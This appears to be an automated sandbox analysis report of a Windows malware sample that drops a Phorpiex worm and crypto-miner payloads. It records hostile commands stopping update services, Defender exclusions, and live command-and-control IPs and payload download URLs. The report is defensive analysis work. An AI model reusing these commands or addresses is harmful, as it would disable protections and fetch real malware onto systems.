                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_00141D28 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00141D28
                                Source: C:\Windows\System32\dwm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Source: C:\Windows\sysppvrdnvs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.21324.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 21324.scr PID: 4416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 1588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4492, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\21324.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040E190
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040E190
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,18_2_00401470
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,18_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,18_2_0040E190
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004013B0 CreateEventA,socket,bind,CreateThread,18_2_004013B0
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                                Windows Management Instrumentation
                                11
                                DLL Side-Loading
                                1
                                Abuse Elevation Control Mechanism
                                31
                                Disable or Modify Tools
                                11
                                Input Capture
                                1
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                34
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts12
                                Native API
                                21
                                Windows Service
                                11
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                System Network Connections Discovery
                                Remote Desktop Protocol11
                                Input Capture
                                2
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts12
                                Command and Scripting Interpreter
                                1
                                Scheduled Task/Job
                                21
                                Windows Service
                                1
                                Abuse Elevation Control Mechanism
                                Security Account Manager2
                                File and Directory Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                1
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job
                                1
                                Registry Run Keys / Startup Folder
                                311
                                Process Injection
                                2
                                Obfuscated Files or Information
                                NTDS27
                                System Information Discovery
                                Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Service Execution
                                Network Logon Script1
                                Scheduled Task/Job
                                11
                                DLL Side-Loading
                                LSA Secrets341
                                Security Software Discovery
                                SSHKeylogging23
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media1
                                PowerShell
                                RC Scripts1
                                Registry Run Keys / Startup Folder
                                221
                                Masquerading
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry
                                DCSync141
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                                Process Injection
                                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Hidden Files and Directories
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542687 Sample: Us051y7j25.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 106 twizthash.net 2->106 120 Multi AV Scanner detection for domain / URL 2->120 122 Suricata IDS alerts for network traffic 2->122 124 Found malware configuration 2->124 126 15 other signatures 2->126 11 Us051y7j25.exe 15 2->11         started        16 winupsecvmgr.exe 2->16         started        18 winupsecvmgr.exe 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 114 twizthash.net 185.215.113.66, 49763, 49814, 49826 WHOLESALECONNECTIONSNL Portugal 11->114 94 C:\Users\user\AppData\Local\Temp\21324.scr, PE32 11->94 dropped 96 C:\Users\user\AppData\Local\...\tdrpl[1].exe, PE32 11->96 dropped 160 Drops PE files with a suspicious file extension 11->160 22 21324.scr 1 1 11->22         started        98 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 16->98 dropped 100 C:\Users\user\AppData\...\jacrzswcvuml.tmp, PE32+ 16->100 dropped 162 Suspicious powershell command line found 16->162 164 Found strings related to Crypto-Mining 16->164 166 Writes to foreign memory regions 16->166 174 3 other signatures 16->174 26 conhost.exe 16->26         started        28 dwm.exe 16->28         started        168 Found direct / indirect Syscall (likely to bypass EDR) 18->168 170 Loading BitLocker PowerShell Module 20->170 30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        file6 172 Detected Stratum mining protocol 114->172 signatures7 process8 file9 82 C:\Windows\sysppvrdnvs.exe, PE32 22->82 dropped 128 Antivirus detection for dropped file 22->128 130 Multi AV Scanner detection for dropped file 22->130 132 Found evasive API chain (may stop execution after checking mutex) 22->132 138 5 other signatures 22->138 38 sysppvrdnvs.exe 10 41 22->38         started        134 Suspicious powershell command line found 26->134 136 Query firmware table information (likely to detect VMs) 28->136 signatures10 process11 dnsIp12 108 62.209.135.143, 40500 TPSUZ-ASUZ Uzbekistan 38->108 110 188.212.80.105, 40500 TCIIR Iran (ISLAMIC Republic Of) 38->110 112 35 other IPs or domains 38->112 86 C:\Users\user\AppData\...\2314627202.exe, PE32 38->86 dropped 88 C:\Users\user\AppData\...\1881231804.exe, PE32+ 38->88 dropped 90 C:\Users\user\AppData\Local\...\146916724.exe, PE32 38->90 dropped 92 3 other malicious files 38->92 dropped 152 Antivirus detection for dropped file 38->152 154 Multi AV Scanner detection for dropped file 38->154 156 Found evasive API chain (may stop execution after checking mutex) 38->156 158 6 other signatures 38->158 43 1091722296.exe 38->43         started        48 1881231804.exe 2 38->48         started        50 cmd.exe 1 38->50         started        52 3 other processes 38->52 file13 signatures14 process15 dnsIp16 116 185.215.113.84, 49991, 80 WHOLESALECONNECTIONSNL Portugal 43->116 102 C:\Users\user\AppData\...\1239611256.exe, PE32+ 43->102 dropped 104 C:\Users\user\AppData\Local\...\nxmr[1].exe, PE32+ 43->104 dropped 176 Antivirus detection for dropped file 43->176 178 Multi AV Scanner detection for dropped file 43->178 180 Machine Learning detection for dropped file 43->180 182 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->182 54 1239611256.exe 43->54         started        58 cmd.exe 1 48->58         started        60 cmd.exe 48->60         started        184 Adds a directory exclusion to Windows Defender 50->184 186 Stops critical windows services 50->186 62 powershell.exe 23 50->62         started        64 conhost.exe 50->64         started        118 91.202.233.141, 49997, 49998, 50010 M247GB Russian Federation 52->118 66 conhost.exe 52->66         started        68 sc.exe 1 52->68         started        70 sc.exe 1 52->70         started        72 3 other processes 52->72 file17 signatures18 process19 file20 84 C:\Users\user\...\winupsecvmgr.exe, PE32+ 54->84 dropped 140 Antivirus detection for dropped file 54->140 142 Multi AV Scanner detection for dropped file 54->142 144 Suspicious powershell command line found 54->144 150 2 other signatures 54->150 146 Uses schtasks.exe or at.exe to add and modify task schedules 58->146 74 conhost.exe 58->74         started        76 reg.exe 58->76         started        78 conhost.exe 60->78         started        80 schtasks.exe 60->80         started        148 Loading BitLocker PowerShell Module 62->148 signatures21 process22

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Us051y7j25.exe41%VirustotalBrowse
                                Us051y7j25.exe42%ReversingLabsWin32.Trojan.Barys
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\AppData\Local\Temp\1239611256.exe100%AviraHEUR/AGEN.1329646
                                C:\Users\user\AppData\Local\Temp\2314627202.exe100%AviraTR/Dldr.Agent.daypt
                                C:\Users\user\AppData\Local\Temp\21324.scr100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Temp\1091722296.exe100%AviraWORM/Phorpiex.olrti
                                C:\Windows\sysppvrdnvs.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exe100%Joe Sandbox ML
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1239611256.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\21324.scr100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1091722296.exe100%Joe Sandbox ML
                                C:\Windows\sysppvrdnvs.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1881231804.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe82%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Temp\1091722296.exe76%ReversingLabsWin32.Worm.Phorpiex
                                C:\Users\user\AppData\Local\Temp\1239611256.exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Users\user\AppData\Local\Temp\146916724.exe55%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1881231804.exe75%ReversingLabsByteCode-MSIL.Trojan.InjectorX
                                C:\Users\user\AppData\Local\Temp\21324.scr82%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Temp\2314627202.exe58%ReversingLabsWin32.Trojan.Malgent
                                C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                                C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys5%ReversingLabs
                                C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe76%ReversingLabsWin64.Trojan.Whisperer
                                C:\Windows\sysppvrdnvs.exe82%ReversingLabsWin32.Trojan.MintZard
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
                                twizthash.net2%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://crl.microsoft0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                http://www.microsoft.c0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                http://185.215.113.84/nxmr.exep15%VirustotalBrowse
                                http://www.t.com/pk0%VirustotalBrowse
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                s-part-0017.t-0009.t-msedge.net
                                13.107.246.45
                                truefalseunknown
                                twizthash.net
                                185.215.113.66
                                truetrueunknown
                                NameMaliciousAntivirus DetectionReputation
                                http://185.215.113.66/tdrpl.exetrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://185.215.113.66/reg.php?s=%s2314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpfalse
                                    unknown
                                    http://www.t.com/pkpowershell.exe, 0000001E.00000002.2936923038.0000025221A92000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://185.215.113.84/nxmr.exe1091722296.exe, 1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://185.215.113.84/nxmr.exep1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://91.202.233.141/ALLBSTATAASASDMozilla/5.0sysppvrdnvs.exe, 00000004.00000002.3525303582.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, 146916724.exe, 0000001D.00000000.2817112808.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp, 146916724.exe, 0000001D.00000002.2876438869.0000000000C92000.00000002.00000001.01000000.0000000D.sdmpfalse
                                        unknown
                                        http://185.215.113.66/tdrpl.exeystem32Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.microsoftpowershell.exe, 0000001E.00000002.2937786376.0000025221AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://185.215.113.66/1Esysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://185.215.113.66/tdrpl.exeUUC:Us051y7j25.exe, 00000000.00000003.2341630604.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://91.202.233.141/21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 146916724.exe, 0000001D.00000002.2876135463.0000000000BEB000.00000004.00000020.00020000.00000000.sdmptrue
                                                unknown
                                                http://91.202.233.141/dersysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://185.215.113.84/nxmr.exeP0sysppvrdnvs.exe, 00000004.00000002.3519879105.0000000002E53000.00000004.00000020.00020000.00000000.sdmp, 1091722296.exe, 0000001B.00000000.2731715048.0000000000602000.00000002.00000001.01000000.0000000B.sdmp, 1091722296.exe, 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                    unknown
                                                    http://schemas.xmlsoap.org/soap/envelope/sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://91.202.233.141/1sysppvrdnvs.exe, 00000004.00000002.3520183951.0000000002F9C000.00000004.00000010.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://185.215.113.66/5hR&sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://91.202.233.141/2sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://185.215.113.66/1zRsysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://91.202.233.141/5sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://91.202.233.141/3sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://91.202.233.141/ALLBSTATAASASDO146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://91.202.233.141/ALLBSTATAASASDH146916724.exe, 0000001D.00000002.2876135463.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://185.215.113.66/4C:sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://185.215.113.66/1MRsysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://crl.m5powershell.exe, 0000001E.00000002.2929967156.0000025221970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://185.215.113.66/17.36C:sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://contoso.com/powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://nuget.org/nuget.exepowershell.exe, 0000001E.00000002.2924839612.000002521948A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://185.215.113.66/Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, 21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmptrue
                                                                              unknown
                                                                              http://91.202.233.141/ALLBSTATAASASD?146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://91.202.233.141/ALLBSTATAASASD146916724.exe, 0000001D.00000002.2876135463.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, 146916724.exe, 0000001D.00000002.2876135463.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://91.202.233.141/4#sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.microsoft.cpowershell.exe, 00000023.00000002.3113150538.0000015DF3020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://91.202.233.141/TLOADEDBROMozilla/5.02314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                      unknown
